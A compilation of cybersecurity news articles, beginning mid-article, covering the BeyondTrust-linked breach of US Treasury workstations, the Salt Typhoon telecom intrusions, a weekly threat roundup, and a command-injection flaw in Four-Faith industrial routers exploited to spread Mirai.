The most important thing that critical industries should be doing is to modernize secure access to remote infrastructure, according to Cantrell. “That’s where most of these breaches come from is through stolen credentials, VPNs, older jump boxes,” he said, adding that visibility is another key piece. “Half the time, they don’t even know everything that is on the network.”

And it’s a lot to deal with for an org using legacy OT gear and trying to get up to speed on IT concepts like zero-trust access while facing down attempted attacks from ransomware crews and nation-states on a daily basis. 

“The scary thing is that some of these threats may be laying in wait and dormant right now,” Cantrell said. “They may be doing some intel collection and possibly laying in wait to trigger actions when they feel it’s necessary.”

He echoed CISA and the FBI’s alerts of late about it being incredibly hard to kick intruders off of critical networks when you don’t know they are there in the first place. “Some of them may be compromised, and they may not even know it.”




Treasury workstations hacked by China-linked threat actors


The Department of Treasury was notified earlier this month that several of its workstations were hacked by a group believed to be linked to China, the department confirmed to CyberScoop.

According to a letter sent Monday to leaders on the Senate Committee on Banking, Housing and Urban Affairs and obtained by CyberScoop, the compromises occurred through third-party software provider BeyondTrust, which provides identity and access management security solutions.

Treasury officials were notified by BeyondTrust on Dec. 8 that “a threat actor had gained access to a key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices end users,” the letter states.

“With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users,” wrote Aditi Hardikar, Treasury’s assistant secretary for management.

In a statement sent to CyberScoop, a BeyondTrust spokesperson said the company first noticed anomalous activity on Dec. 2 and confirmed on Dec. 5 that it affected a “limited” number of Remote Support SaaS customers. The company said it posted an advisory about the incident on Dec. 8, and its timeline indicates that all identified instances were patched as of Dec. 16.

“No other BeyondTrust products were involved. Law enforcement was notified and BeyondTrust has been supporting the investigative efforts,” the statement said.

Hardikar wrote that the hacks are being classified as a “major incident” under the Federal Information Security and Modernization Act, and the department has been working with the Cybersecurity and Infrastructure Security Agency, the FBI, intelligence agencies, and third-party forensic investigators to scope out the full impact.

“Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat actor,” Hardikar wrote.

In response to questions, a Treasury spokesperson said the threat actor was able to remotely access “several” Treasury user workstations as well as “certain unclassified documents” maintained by those users. The unnamed BeyondTrust service was taken offline and the department believes the actor no longer has access to Treasury systems or information.

News of the hacks was first reported by Barron’s and Agence France-Presse.

The incident comes as Washington policymakers are still reeling from a wide-ranging compromise of U.S. telecommunications infrastructure by Salt Typhoon, a hacking group linked to the Chinese government. Those compromises gave Beijing broad access to the phones and communications of high-ranking U.S. officials, including reportedly, incoming President-elect Donald Trump and Vice President-elect JD Vance.

This week, the White House said that while fewer than 100 individuals are believed to have been directly impacted by the Salt Typhoon intrusions, a larger group centered around Washington D.C. may have had their geolocation data stolen, something that could potentially allow Chinese intelligence agencies to identify the phones of additional targets.


Written by Derek B. Johnson

Derek B. Johnson is a reporter at CyberScoop, where his beat includes cybersecurity, elections and the federal government. Prior to that, he has provided award-winning coverage of cybersecurity news across the public and private sectors for various publications since 2017. Derek has a bachelor’s degree in print journalism from Hofstra University in New York and a master’s degree in public policy from George Mason University in Virginia.




Chinese State Hackers Breach US Treasury Department


UPDATE: This story was updated on Dec. 30 to include a statement from a BeyondTrust spokesperson.

The US Department of the Treasury alerted lawmakers on Monday that Chinese state-backed threat actors were able to compromise its systems and steal data from workstations earlier this month.

Because an advanced persistent threat (APT) group is suspected to be behind the hack, it is being treated as a “major cybersecurity incident,” according to the disclosure letter from the US Department of the Treasury, which was sent to the chairman and ranking member of the Senate committee that oversees the agency.

It explained the adversaries broke into Treasury through a third-party cybersecurity vendor, BeyondTrust, and “…gained access to a remote key used by the vendor to secure a cloud-based service used to remotely provide technical support for Treasury Departmental Offices (DO) end users,” the letter said. “With access to the stolen key, the threat actor was able to override the service’s security, remotely access certain Treasury DO user workstations, and access certain unclassified documents maintained by those users.”

The BeyondTrust website said the company has more than 20,000 customers across more than 100 countries who use its privileged remote access tools. The site adds BeyondTrust is used among 75% of Fortune 100 organizations. The company has not responded to Dark Reading’s request for comment.

Treasury added that it was told by BeyondTrust about the issue on Dec. 8 and, along with the Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, is investigating the compromise, according to the letter.

A BeyondTrust advisory said the company was alerted on Dec. 5 to a compromised API key, which was immediately revoked. Impacted customers have already been notified and the company is working with them on remediation, according to a statement from a BeyondTrust spokesperson.

“BeyondTrust previously identified and took measures to address a security incident in early December 2024 that involved the Remote Support product,” the statement said. “No other BeyondTrust products were involved.”

‘Epic’ Chinese Hack of US Treasury

The revelation that Beijing was able to strike right at the heart of America’s federal capitalist system itself comes as the federal government is still grappling with the sprawling and coordinated Chinese-backed cyberattacks against telecommunications companies in the US. Once inside, hackers from groups including Salt Typhoon accessed call data and text messages of an unknown number of Americans. So far, Chinese hacking groups have been discovered inside at least nine different telecom networks in the US.

While investigations into the US Treasury breach are ongoing, these brazen Chinese acts of cyber espionage are almost certain to require dicey diplomatic maneuvering. That could prove difficult to pull off during the murky transition period from the Biden administration to the incoming Trump administration.

“Beijing’s routine denial of responsibility for cyberespionage incidents raises diplomatic challenges with the US in addressing such breaches effectively since there’s lack of transparency and accountability/coordination,” Lawrence Pingree, vice president of Dispersive said in a statement provided to Dark Reading.

He added that it’s still unclear whether the Chinese hackers were able to crack the application’s secrets, or a cryptographic key.

“Secrets and cryptographic key management are critical elements of managing software API access and thus if deficient in some way, or a compromise occurs via a developer’s endpoint, the breach of those secrets and authentication keys can create these types of epic breaches,” he added.

The breach also shows that cybersecurity vendors remain favorite targets of sophisticated state threat actors, according to former NSA cyber expert Evan Dornbush, who provided a statement in reaction to the breach.

“The cybersecurity world is reeling from yet another high-profile breach, this time targeting the clients of security vendor BeyondTrust,” Dornbush said. “This incident joins a growing list of attacks on security firms, including Okta (whose breach directly impacted BeyondTrust as a customer), LastPass, SolarWinds, and Snowflake.”




US Treasury Department breached through remote support platform



Chinese state-sponsored threat actors hacked the U.S. Treasury Department after breaching a remote support platform used by the federal agency.

In a letter sent to lawmakers and seen by the New York Times, the Treasury Department said it was first notified of the breach on December 8th by its vendor BeyondTrust.

BeyondTrust is a privileged access management company that also offers a remote support SaaS platform that can be used to access computers remotely.

“Based on available indicators, the incident has been attributed to a China state-sponsored Advanced Persistent Threat (APT) actor,” reads the letter seen by the New York Times.

“In accordance with Treasury policy, intrusions attributable to an APT are considered a major cybersecurity incident.”

Earlier this month, BleepingComputer reported that BeyondTrust had been breached, with threat actors gaining access to some of the company’s Remote Support SaaS instances.

As part of this breach, the threat actors utilized a stolen Remote Support SaaS API key to reset passwords for local application accounts and gain further privileged access to the systems.

After investigating the attack, BeyondTrust discovered two zero-day vulnerabilities, CVE-2024-12356 and CVE-2024-12686, that allowed threat actors to breach and take over Remote Support SaaS instances.

As the Treasury Department was a customer of one of these compromised instances, the threat actors were able to use the platform to access agency computers and steal documents remotely.

After BeyondTrust detected the breach, they shut down all compromised instances and revoked the stolen API key.

The letter says that the FBI and CISA assisted in the investigation into the Treasury Department breach, and there is no evidence that the Chinese threat actors still have access to the agency’s computers now that the compromised instances were shut down.

Chinese state-sponsored threat actors named “Salt Typhoon” have also been linked to recent hacks of nine U.S. telecommunication companies, including Verizon, AT&T, Lumen, and T-Mobile. The threat actors are believed to have breached telecom firms in dozens of other countries.

The threat actors utilized this access to target the text messages, voicemails, and phone calls of targeted individuals, and to access wiretap information of those under investigation by law enforcement.

Since this wave of telecom breaches, CISA has urged senior government officials to switch to end-to-end encrypted messaging apps like Signal to reduce communication interception risks.

The U.S. government reportedly plans to ban China Telecom’s last active U.S. operations in response to the telecom hacks.

BleepingComputer sent further questions to the State Department about the breach but has not received a reply yet.




Top Cybersecurity Threats, Tools and Tips


Dec 30, 2025 | Ravie Lakshmanan | Cybersecurity / Hacking News

Every week, the digital world faces new challenges and changes. Hackers are always finding new ways to breach systems, while defenders work hard to keep our data safe. Whether it’s a hidden flaw in popular software or a clever new attack method, staying informed is key to protecting yourself and your organization.

In this week’s update, we’ll cover the most important developments in cybersecurity. From the latest threats to effective defenses, we’ve got you covered with clear and straightforward insights. Let’s dive in and keep your digital world secure.

⚡ Threat of the Week

Palo Alto Networks PAN-OS Flaw Under Attack — Palo Alto Networks has disclosed a high-severity flaw impacting PAN-OS software that could cause a denial-of-service (DoS) condition on susceptible devices by sending a specially crafted DNS packet. The vulnerability (CVE-2024-3393, CVSS score: 8.7) only affects firewalls that have the DNS Security logging enabled. The company said it’s aware of “customers experiencing this denial-of-service (DoS) when their firewall blocks malicious DNS packets that trigger this issue.”

🔔 Top News

  • Contagious Interview Drops OtterCookie Malware — North Korean threat actors behind the ongoing Contagious Interview campaign have been observed dropping a new JavaScript malware called OtterCookie. The malware, likely introduced in September 2024, is designed to establish communications with a command-and-control (C2) server using the Socket.IO JavaScript library, and awaits further instructions. It’s designed to run shell commands that facilitate data theft, including files, clipboard content, and cryptocurrency wallet keys.
  • Cloud Atlas Continues its Assault on Russia — Cloud Atlas, a hacking group of unknown origin that has extensively targeted Russia and Belarus, has been observed using a previously undocumented malware called VBCloud as part of its cyber attack campaigns targeting “several dozen users” in 2024. The attacks employ phishing emails containing Microsoft Word documents, which, when opened, trigger an exploit for a seven-year-old security flaw to deliver the malware. VBCloud is capable of harvesting files matching several extensions and information about the system. More than 80% of the targets were located in Russia. A smaller number of victims have been recorded in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam.
  • Malicious Python Packages Exfiltrate Sensitive Data — Two malicious Python packages, named zebo and cometlogger, have been found to incorporate features to exfiltrate a wide range of sensitive information from compromised hosts. The packages were downloaded 118 and 164 times, respectively, before they were taken down. A majority of these downloads came from the United States, China, Russia, and India.
  • TraderTraitor Behind DMM Bitcoin Crypto Heist — Japanese and U.S. authorities officially blamed a North Korean threat cluster codenamed TraderTraitor (aka Jade Sleet, UNC4899, and Slow Pisces) for the theft of cryptocurrency worth $308 million from cryptocurrency company DMM Bitcoin in May 2024. The attack is notable for the fact that the adversary first compromised the system of an employee of Japan-based cryptocurrency wallet software company named Ginco under the pretext of a pre-employment test. “In late-May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” authorities said.
  • WhatsApp Scores Legal Victory Against NSO Group — NSO Group has been found liable in the United States after a federal judge in the state of California ruled in favor of WhatsApp, calling out the Israeli commercial spyware vendor for exploiting a security vulnerability in the messaging app to deliver Pegasus using WhatsApp’s servers 43 times in May 2019. The targeted attacks deployed the spyware on 1,400 devices globally by making use of a then zero-day vulnerability in the app’s voice calling feature (CVE-2019-3568, CVSS score: 9.8).

🔥 Trending CVEs

Heads up! Some popular software has serious security flaws, so make sure to update now to stay safe. The list includes — CVE-2024-56337 (Apache Tomcat), CVE-2024-45387 (Apache Traffic Control), CVE-2024-43441 (Apache HugeGraph-Server), CVE-2024-52046 (Apache MINA), CVE-2024-12856 (Four-Faith routers), CVE-2024-47547, CVE-2024-48874, and CVE-2024-52324 (Ruijie Networks).

📰 Around the Cyber World

  • ScreenConnect Used to Deploy AsyncRAT — Microsoft has revealed that cybercriminals are leveraging tech support scams to deploy AsyncRAT through the remote monitoring and management (RMM) software ScreenConnect, the first time that ScreenConnect has been used to deploy malware rather than as a persistence or lateral movement tool. The company also said threat actors are using SEO poisoning and typosquatting to deploy SectopRAT, an infostealer used to target browser information and crypto wallets. The disclosure comes as Malwarebytes disclosed that criminals are employing decoy landing pages, also called “white pages,” that utilize AI-generated content and are propagated via bogus Google search ads. The scam involves attackers buying Google Search ads and using AI to create harmless pages with unique content. The goal is to use these decoy ads to then lure visitors to phishing sites for stealing credentials and other sensitive data. Malvertising lures have also been used to distribute SocGholish malware by disguising the page as an HR portal for a legitimate company named Kaiser Permanente.
  • AT&T, Verizon Acknowledge Salt Typhoon Attacks — U.S. telecom giants AT&T and Verizon acknowledged that they had been hit by the China-linked Salt Typhoon hacking group, a month after T-Mobile made a similar disclosure. Both companies said they do not detect any malicious activity at this point, and that the attacks singled out a “small number of individuals of foreign intelligence interest.” The breaches occurred in large part because the affected companies failed to implement rudimentary cybersecurity measures, the White House said. The exact scope of the attack campaign still remains unclear, although the U.S. government revealed that a ninth telecom company in the country was also a target of what now appears to be a sprawling hacking operation aimed at U.S. critical infrastructure. Its name was not disclosed. China has denied any involvement in the attacks.
  • Pro-Russian Hacker Group Targets Italian Websites — Around ten official websites in Italy were targeted by a pro-Russian hacker group named Noname057(16). The group claimed responsibility for the distributed denial-of-service (DDoS) attacks on Telegram, stating Italy’s “Russophobes get a well deserved cyber response.” Back in July, three members of the group were arrested for alleged cyber attacks against Spain and other NATO countries. Noname057(16) is one of the many hacktivist groups that have emerged in response to the ongoing conflicts in Ukraine and the Middle East, with groups aligned on both sides engaging in disruptive attacks to achieve social or political goals. Some of these groups are also state-sponsored, posing a significant threat to cybersecurity and national security. According to a recent analysis by cybersecurity company Trellix, it’s suspected that there’s some kind of an operational relationship between Noname057(16) and CyberArmyofRussia_Reborn, another Russian-aligned hacktivist group active since 2022. “The group has created alliances with many other hacktivist groups to support their efforts with the DDoS attacks,” Trellix said. “However, the fact that one of the previous CARR administrators, ‘MotherOfBears,’ has joined NoName057(16), the continuous forwarding of CARR posts, and previous statements, suggest that both groups seem to collaborate closely, which can also indicate a cooperation with Sandworm Team.”
  • UN Approves New Cybercrime Treaty to Tackle Digital Threats — The United Nations General Assembly formally adopted a new cybercrime convention, called the United Nations Convention against Cybercrime, that’s aimed at bolstering international cooperation to combat such transnational threats. “The new Convention against Cybercrime will enable faster, better-coordinated, and more effective responses, making both digital and physical worlds safer,” the UN said. “The Convention focuses on frameworks for accessing and exchanging electronic evidence, facilitating investigations and prosecutions.” INTERPOL Secretary General Valdecy Urquiza said the UN cybercrime convention “provides a basis for a new cross-sector level of international cooperation” necessary to combat the borderless nature of cybercrime.
  • WDAC as a Way to Impair Security Defenses — Cybersecurity researchers have devised a new attack technique that leverages a malicious Windows Defender Application Control (WDAC) policy to block security solutions such as Endpoint Detection and Response (EDR) sensors following a system reboot. “It makes use of a specially crafted WDAC policy to stop defensive solutions across endpoints and could allow adversaries to easily pivot to new hosts without the burden of security solutions such as EDR,” researchers Jonathan Beierle and Logan Goins said. “At a larger scale, if an adversary is able to write Group Policy Objects (GPOs), then they would be able to distribute this policy throughout the domain and systematically stop most, if not all, security solutions on all endpoints in the domain, potentially allowing for the deployment of post-exploitation tooling and/or ransomware.”

🎥 Expert Webinar

  1. Don’t Let Ransomware Win: Discover Proactive Defense Tactics — Ransomware is getting smarter, faster, and more dangerous. As 2025 nears, attackers are using advanced tactics to evade detection and demand record-breaking payouts. Are you ready to defend against these threats? Join the Zscaler ThreatLabz webinar to learn proven strategies and stay ahead of cybercriminals. Don’t wait—prepare now to outsmart ransomware.
  2. Simplify Trust Management: Centralize, Automate, Secure — Managing digital trust is complex in today’s hybrid environments. Traditional methods can’t meet modern IT, DevOps, or compliance demands. DigiCert ONE simplifies trust with a unified platform for users, devices, and software. Join the webinar to learn how to centralize management, automate operations, and secure your trust strategy.

🔧 Cybersecurity Tools

  • LogonTracer is a powerful tool for analyzing and visualizing Windows Active Directory event logs, designed to simplify the investigation of malicious logons. By mapping host names, IP addresses, and account names from logon-related events, it creates intuitive graphs that reveal which accounts are being accessed and from which hosts. LogonTracer overcomes the challenges of manual analysis and massive log volumes, helping analysts quickly identify suspicious activity with ease.
  • Game of Active Directory (GOAD) is a free, ready-to-use Active Directory lab designed specifically for pentesters. It offers a pre-built, intentionally vulnerable environment where you can practice and refine common attack techniques. Perfect for skill-building, GOAD eliminates the complexity of setting up your own lab, allowing you to focus on learning and testing various pentesting strategies in a realistic yet controlled setting.

🔒 Tip of the Week

Isolate Risky Apps with Separate Spaces — When you need to use a mobile app but aren’t sure if it’s safe, protect your personal data by running the app in a separate space on your phone. For Android users, go to Settings > Users & Accounts and create a Guest or new user profile.

Install the uncertain app within this isolated profile and restrict its permissions, such as disabling access to contacts or locations. iPhone users can use Guided Access by navigating to Settings > Accessibility > Guided Access to limit what the app can do. This isolation ensures that even if the app contains malware, it cannot access your main data or other apps.

If the app behaves suspiciously, you can easily remove it from the separate space without affecting your primary profile. By isolating apps you’re unsure about, you add an extra layer of security to your device, keeping your personal information safe while still allowing you to use the necessary tools.

Conclusion

This week’s cybersecurity updates highlight the importance of staying vigilant and prepared. Here are some simple steps to keep your digital world secure:

  • Update Regularly: Always keep your software and devices up-to-date to patch security gaps.
  • Educate Your Team: Teach everyone to recognize phishing emails and other common scams.
  • Use Strong Passwords: Create unique, strong passwords and enable two-factor authentication where possible.
  • Limit Access: Ensure only authorized people can access sensitive information.
  • Back Up Your Data: Regularly back up important files so you can recover quickly if something goes wrong.

By taking these actions, you can protect yourself and your organization from emerging threats. Stay informed, stay proactive, and prioritize your cybersecurity. Thank you for joining us this week—stay safe online, and we look forward to bringing you more updates next week!





AT&T, Verizon, Lumen confirm Salt Typhoon breach • The Register


AT&T, Verizon, and Lumen Technologies confirmed that Chinese government-backed snoops accessed portions of their systems earlier this year, while the White House added another, yet-unnamed telecommunications company to the list of those breached by Salt Typhoon.

The digital intrusion, which has been called the “worst telecom hack in our nation’s history,” gave Beijing-backed spies the “capability to geolocate millions of individuals” and “record phone calls at will,” Anne Neuberger, deputy national security advisor for cyber and emerging technology, told reporters.

In a statement emailed to The Register, AT&T said the foreign spies compromised “a small number” of its customers in the espionage campaign and added that the PRC-backed crew had since been kicked out of its networks.

“We detect no activity by nation-state actors in our networks at this time,” an AT&T spokesperson said. 

“Based on our current investigation of this attack, the People’s Republic of China targeted a small number of individuals of foreign intelligence interest,” the statement added. “In the relatively few instances in which an individual’s information was impacted, we have complied with our notification obligations in cooperation with law enforcement.”

AT&T continues to monitor its networks and work with government officials, other telecom firms, and cybersecurity experts on the investigation, the spokesperson said.

Verizon also confirmed that the Chinese intruders had accessed “a small number of high-profile customers in government and politics.” A spokesperson told The Register that it notified these customers, and has since “contained the cyber incident brought on by this nation-state threat actor.”

An unnamed, “highly respected” cybersecurity company has also confirmed the containment, the Verizon spokesperson added.

According to the operator’s chief legal officer, Verizon partnered with federal law enforcement, national security agencies, other telecom partners, and security firms upon detecting the network activity.

“We have not detected threat actor activity in Verizon’s network for some time, and after considerable work addressing this incident, we can report that Verizon has contained the activities associated with this particular incident,” Verizon’s Chief Legal Officer Vandana Venkatesh told The Register.

Finally, Lumen Technologies, another one of the firms reportedly breached in the attack, told us that it has also booted the Chinese attackers out of its systems, and said it found “no evidence” that customer data was accessed.

“An independent forensics firm has confirmed Salt Typhoon is no longer in our network,” a spokesperson told The Register. “In addition, our federal partners have not shared any information that would suggest otherwise.”

T-Mobile’s security boss previously spoke to The Register about the espionage campaign and said it thwarted successful attacks on its systems “within a single-digit number of days.”

9 telecom firms compromised, White House says

The companies’ admissions come as a top White House official added another unnamed firm to the breach, bringing the total thus far to nine. Neuberger previously said eight had been compromised. Only three — AT&T, Verizon, and T-Mobile US — have confirmed the intrusion.


“The Chinese gained access to networks, essentially had broad and full access,” Neuberger told reporters. “We believe that’s why they had the capability to geolocate millions of individuals, to record phone calls at will, because they had that broad access.”

In one instance, the spies broke into an admin account that then gave them access to more than 100,000 routers, she added. “So, when the Chinese compromised that account, they gained that kind of broad access across the network,” Neuberger said. “That’s not meaningful cybersecurity to defend against a nation-state actor.” 

The White House doesn’t yet have a number on how many total people were affected by the breach, she added. 

“We believe a large number of individuals were affected by geolocation and metadata of phones; a smaller number around actual collection of phone calls and texts,” Neuberger said. “And I think the scale we’re talking about is far larger on the geolocation; probably less than 100 on the actual individuals.”

Following the intrusion, the White House emphasized the inadequacy of voluntary cybersecurity measures against nation-state threats. The Federal Communications Commission (FCC) launched a public rule proposal requiring basic cybersecurity practices for telecom carriers. The commissioners are expected to vote on the rule by January 15.

In addition to the FCC’s own efforts, US Senator Ron Wyden (D-OR) has also proposed legislation that would require the FCC to issue binding rules for telecom systems.

Plus, according to Neuberger, all of the nine telecom CEOs whose companies were hacked have signed on to the government’s 60-day Enduring Security Framework.

This public-private effort aims to put in place minimum cybersecurity practices that have been agreed upon by intelligence officers, CISA, the FBI, and telecom security experts.




Thousands of industrial routers vulnerable to command injection flaw 


Thousands of industrial routers from a Chinese telecommunications equipment manufacturer are vulnerable to a post-authentication vulnerability, with indications it is already being exploited in the wild to infect devices with Mirai malware.

On Dec. 27, VulnCheck detailed the vulnerability, tracked as CVE-2024-12856, wherein an attacker can leverage default credentials in Four-Faith F3x24 and F3x36 routers to remotely inject commands into the operating system. 

Meanwhile, a malicious IP was observed attempting to leverage the vulnerability. VulnCheck Chief Technology Officer Jacob Baines wrote that his team identified the same user agent referenced in a November blog by DucklingStudio attempting to use the vulnerability to deploy a different malware payload.

Baines also posted a video demonstration of the flaw being exploited on X.

The vulnerability appears to be connected to the spread of a variant of Mirai, the infamous malware and botnet known to target Internet of Things devices. DucklingStudio used a honeypot to detect the malware on Nov. 9, and an update on Dec. 28 explicitly connected it to the listed CVE for Four-Faith’s industrial routers.

Variants of Mirai — first observed in 2016 and originally written by a group of teenagers to create botnets — remain one of the most popular forms of malware attacking IoT devices worldwide. According to Zscaler, Mirai was identified in over a third of all IoT malware attacks between June 2023 and May 2024, far outpacing other malware families, while more than 75% of blocked IoT transactions were linked to the malicious code.

VulnCheck wrote up a rule for detecting instances of infected routers using the open-source threat detection tool Suricata:

(Image: Detection rule for CVE-2024-12856 affecting Four-Faith industrial routers. Source: VulnCheck)

According to Censys, there are at least 15,000 connected routers potentially vulnerable to the flaw, and VulnCheck left open the possibility that additional router products may be affected. The National Institute of Standards and Technology’s National Vulnerability Database lists the severity of the bug at 7.2 and notes that firmware version 2.0 (and possibly others) allows for authenticated and remote command injection attacks over HTTP.

The listed CVE does not yet include details about patching or remediation. Baines noted in his blog that VulnCheck notified Four-Faith of the vulnerability and affected routers on Dec. 20, and directed further questions about remediation to the company. Four-Faith did not return a request for comment sent through its website prior to publication.

According to the company’s website, Four-Faith is headquartered in Xiamen, a city in the southeastern province of Fujian, China. It specializes in manufacturing industrial routers, Internet of Things devices, modems and other wireless communications technologies, and claims to have exported its technologies to over 100 countries.


Written by Derek B. Johnson



